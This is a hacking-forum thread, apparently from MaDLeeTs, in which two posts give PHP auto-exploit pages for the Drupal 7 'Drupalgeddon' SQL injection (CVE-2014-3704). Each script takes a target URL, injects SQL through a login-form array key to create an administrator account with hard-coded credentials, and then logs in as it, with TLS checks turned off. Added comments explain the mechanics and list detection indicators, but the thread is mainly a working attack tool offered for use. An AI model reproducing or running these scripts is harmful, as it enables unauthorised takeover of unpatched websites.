MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


[PHP] Drupal 7 HTTP parameter-key SQL injection (CVE-2014-3704, "Drupalgeddon") — affects Drupal 7.0–7.31, fixed in 7.32



03-21-2017, 04:30 PM #1
aerow0rm Offline Newbie **
Registered
Posts:6 Threads:3 Joined:Mar 2017 Reputation: 0
Mood: Crackhead
Code:
<center><img src='http://i.imgur.com/N39PFcZ.png' height="150" width="150"></img><br><br>
<font face='courier' color=red size='+1'>
CVE-2014-3704 <br>by Aero7<br>Don't Change Right Noob</font><br><br>
<form method="POST"><strong></strong><input type="text" name="sub" value="http://localhost" ><input type="submit" name="send" value="Pwn!"></form><br></center>

<?php
// Drupalgeddon (CVE-2014-3704) auto-exploit. The SQL injection rides in an array *key* of the
// user_login form's `name` parameter: the injected statements insert a new users row and attach
// it to the 'administrator' role, then the script tries to log in as that account.
// Only Drupal 7.0-7.31 is affected; 7.32 fixed the placeholder expansion.
//
// NOTE(review): this page takes an arbitrary URL from the form and makes *this* server fetch and
// POST to it with no validation and no authentication, so anyone who can reach the page can use it
// as an SSRF / attack relay. Restrict access and validate $_POST['sub'] before deploying anywhere.
if($_POST) {

// Target base URL exactly as submitted (form default is http://localhost); no scheme/host check.
$tar = $_POST['sub'];

// Fetch the login page to harvest form_build_id. The `@` silences fetch errors, so an unreachable
// target simply falls through to the "Exploit Fail" branch below.
// (file_get_contents on an http(s) URL needs allow_url_fopen=On.)
$get = @file_get_contents("$tar/?q=user/login");

// The regex assumes Drupal's exact markup `name="form_build_id" value="..." />`; any other layout
// (theme, reverse proxy rewriting) yields no match and the script reports failure.
if(preg_match_all("#name=\"form_build_id\" value=\"(.*?)\" />#i",$get,$name)) {  

$tokens = $name[1];

// The loop body is empty: its only effect is that $token holds the LAST matched form_build_id
// once the loop finishes (equivalent to end($name[1])).
foreach($tokens as $token){

}

// Login request for the account the payload creates. Credentials are hard-coded.
$test = "name=Aero7&pass=dKMNrGsieC&form_build_id=$token&form_id=user_login&op=Log%20in";
// URL-decoded, the first form key is:
//   name[0 ;insert into users (uid, name, pass, mail, status)
//            select max(uid)+1, 'Aero7', '$P\$8bxHyxnrtHg9WpndBMckxyzi.uGQfu/', 'test@test.com', 1 from users;
//          insert into users_roles (uid, rid) VALUES ((select uid from users where name='Aero7'),
//            (select rid from role where name = 'administrator')); # ]
// i.e. the SQL is the array key, followed by an ordinary name[0]/pass pair so the form still parses.
// NOTE(review): the hash literal carries a backslash (`$P\$8bx...`). This appears to rely on MySQL
// dropping an unrecognised backslash escape so the stored value is `$P$8bx...`; a back-end that
// keeps the backslash would store a hash that never matches and the login below would fail. The
// hash is presumably the phpass hash of the password in $test (not verified here). The role lookup
// also assumes a role literally named 'administrator'.
// Detection note: the outcome is a fixed IOC - a users row Aero7 / test@test.com with this hash,
// plus a users_roles row pointing at the administrator rid.
$payload = "name%5b0%20%3binsert%20into%20users%20%28uid%2c%20name%2c%20pass%2c%20mail%2c%20status%29%20select%20max%28uid%29%2b1%2c%20%27Aero7%27%2c%20%27%24P\%248bxHyxnrtHg9WpndBMckxyzi.uGQfu/%27%2c%20%27test%40test.com%27%2c%201%20from%20users%3b%20insert%20into%20users_roles%20%28uid%2c%20rid%29%20VALUES%20%28%28select%20uid%20from%20users%20where%20name%3d%27Aero7%27%29%2c%20%28select%20rid%20from%20role%20where%20name%20%3d%20%27administrator%27%29%29%3b%20%23%20%5d=zcxmnTgToc&name%5b0%5d=ibWmQQZOCK&pass=dVCeuMFNMV&form_build_id=$token&form_id=user_login&op=Log%20in";

// Request 1: POST the injection. TLS certificate checks are switched off (VERIFYPEER/VERIFYHOST = 0),
// so an https target can be silently intercepted; redirects are followed.
$ch = curl_init ($tar."/?q=user/login");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $payload);
// $data is never inspected; a transport failure (curl_exec returning false) is not detected.
$data = curl_exec ($ch);
curl_close($ch);

// Printed unconditionally - "Payload Sent" does not mean the injection executed.
echo "<center> Payload Sent !</center>";
echo "<br> <center>Create NeW Account Admin <br></center>";

// Request 2: log in as the injected account. Note the inconsistency with request 1: TLS
// verification is left at curl's default here, so against an https target with an untrusted
// certificate request 1 goes through but this one fails.
$ch1 = curl_init ($tar."/?q=user/login");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_POST, 1);
curl_setopt ($ch1, CURLOPT_POSTFIELDS, $test);
$data1 = curl_exec ($ch1);
curl_close($ch1);

// Success heuristic: any of these substrings in the post-login page. It is loose (a page that
// merely links to /admin/ counts) and is case-insensitive.
// NOTE(review): eregi() was deprecated in PHP 5.3 and removed in PHP 7.0 - on current PHP this
// line is a fatal "undefined function" error. The equivalent is preg_match("#/user/1#i", $data1) etc.
if(eregi("/user/1",$data1) || eregi("/admin/",$data1) || eregi("/user/aero7",$data1) || eregi("/users/aero7",$data1))
{
       echo "<br> <center>SuccessFull <br>Account : Aero7:dKMNrGsieC<br></center>";
} else { echo "<br><center> Exploit Fail<br></center>"; }
} else { echo "<br><center>Exploit Fail<br> </center>"; }
}
?>

------------------------------------------------
[#] CodeName: Aero7
[#] Email: [email protected]

-------------------------------------------------
[Image: o8rq6s.jpg]

03-22-2017, 10:02 AM #2
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
:3 :3 Now I obfuscate my code — there are a lot of leechers on the web.


Original: http://pastebin.com/3psJNVtu (posted 8 December 2014)

06-14-2017, 03:28 AM #3
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
Leeching is strong with this one ;D Anyway, here is a cleaned-up version of it (same behaviour, same eregi() dependency).
Code:
<html>
<head>
<title>Auto Exploit for Drupal - Aero7</title>
</head>
<body>
<center>
<img src='http://i.imgur.com/N39PFcZ.png' height="150" width="150">
<br><br>
<font face='courier' color=red size='+1'>
CVE-2014-3704 <br>by Aero7<br>
</font>
<br><br>
<form method="POST">
<input type="text" name="sub" value="http://localhost" >
<input type="submit" name="send" value="Pwn!">
</form>
<br>
</center>
<?php
// Cleaned-up variant of the CVE-2014-3704 (Drupalgeddon) script from post #1. Same two-request
// flow: inject SQL through an array key of the user_login `name` parameter to create an
// administrator account, then log in as it. Differences from post #1: !empty() guard, end()
// instead of the empty foreach, TLS verification disabled on BOTH requests, first response dropped.
// Only Drupal 7.0-7.31 is affected; 7.32 fixed the placeholder expansion.
//
// NOTE(review): $_POST['sub'] is an unvalidated, unauthenticated, attacker-chosen URL that this
// server will fetch and POST to - the page is an open SSRF / attack relay wherever it is hosted.
if(!empty($_POST)) {
// Target base URL exactly as submitted; no scheme/host check.
$site = $_POST['sub'];
// Harvest form_build_id from the login page. `@` hides fetch errors (an unreachable target just
// reports "Exploit Fail"); file_get_contents on a URL needs allow_url_fopen=On.
$get = @file_get_contents("$site/?q=user/login");
// Regex is tied to Drupal's exact `name="form_build_id" value="..." />` markup.
if(preg_match_all("#name=\"form_build_id\" value=\"(.*?)\" />#i",$get,$name)) {  
// Last matched token (what post #1 obtained via its empty foreach loop).
$token = end($name[1]);
// Login request for the account the payload creates; credentials are hard-coded.
$test = "name=Aero7&pass=dKMNrGsieC&form_build_id=$token&form_id=user_login&op=Log%20in";
// URL-decoded, the first key is
//   name[0 ;insert into users (uid, name, pass, mail, status)
//            select max(uid)+1, 'Aero7', '$P\$8bxHyxnrtHg9WpndBMckxyzi.uGQfu/', 'test@test.com', 1 from users;
//          insert into users_roles (uid, rid) VALUES ((select uid from users where name='Aero7'),
//            (select rid from role where name = 'administrator')); # ]
// NOTE(review): the backslash inside the hash literal (`$P\$8bx...`) appears to depend on MySQL
// discarding an unrecognised backslash escape; a back-end that keeps it stores an unusable hash.
// The hash is presumably the phpass hash of dKMNrGsieC (not verified here), and a role literally
// named 'administrator' must exist.
// Detection note: fixed IOC - users row Aero7 / test@test.com with this hash plus a users_roles
// row for the administrator rid.
$payload = "name%5b0%20%3binsert%20into%20users%20%28uid%2c%20name%2c%20pass%2c%20mail%2c%20status%29%20select%20max%28uid%29%2b1%2c%20%27Aero7%27%2c%20%27%24P\%248bxHyxnrtHg9WpndBMckxyzi.uGQfu/%27%2c%20%27test%40test.com%27%2c%201%20from%20users%3b%20insert%20into%20users_roles%20%28uid%2c%20rid%29%20VALUES%20%28%28select%20uid%20from%20users%20where%20name%3d%27Aero7%27%29%2c%20%28select%20rid%20from%20role%20where%20name%20%3d%20%27administrator%27%29%29%3b%20%23%20%5d=zcxmnTgToc&name%5b0%5d=ibWmQQZOCK&pass=dVCeuMFNMV&form_build_id=$token&form_id=user_login&op=Log%20in";
// Request 1: POST the injection. Certificate checks are off, so an https target can be
// intercepted without notice; redirects are followed.
$ch = curl_init ("$site/?q=user/login");
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $payload);
// Return value discarded: a transport failure is not detected.
curl_exec($ch);
curl_close($ch);
// Printed regardless of outcome - "Payload Sent" is not evidence the SQL ran.
echo "<center>
Payload Sent !
</center>
<br>
<center>
Create NeW Account Admin
</center>
<br>";
// Request 2: log in as the injected account (same curl settings as request 1).
$ch1 = curl_init ("$site/?q=user/login");
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch1, CURLOPT_POST, 1);
curl_setopt ($ch1, CURLOPT_POSTFIELDS, $test);
$data1 = curl_exec ($ch1);
curl_close($ch1);
// Loose, case-insensitive substring heuristic for "logged in as admin".
// NOTE(review): eregi() was removed in PHP 7.0 - this is a fatal error on current PHP. Use
// preg_match("#/user/1#i", $data1) and friends instead.
if(eregi("/user/1",$data1) || eregi("/admin/",$data1) || eregi("/user/aero7",$data1) || eregi("/users/aero7",$data1)){
echo "<br> <center>SuccessFull <br>Account : Aero7:dKMNrGsieC<br></center>";
}else{
echo "<br><center> Exploit Fail<br></center>";
}
}else{
echo "<br><center>Exploit Fail<br></center>";
}
}
?>
</body>
</html>

[Image: xodhvlpa.jpg]
[Image: test.php]





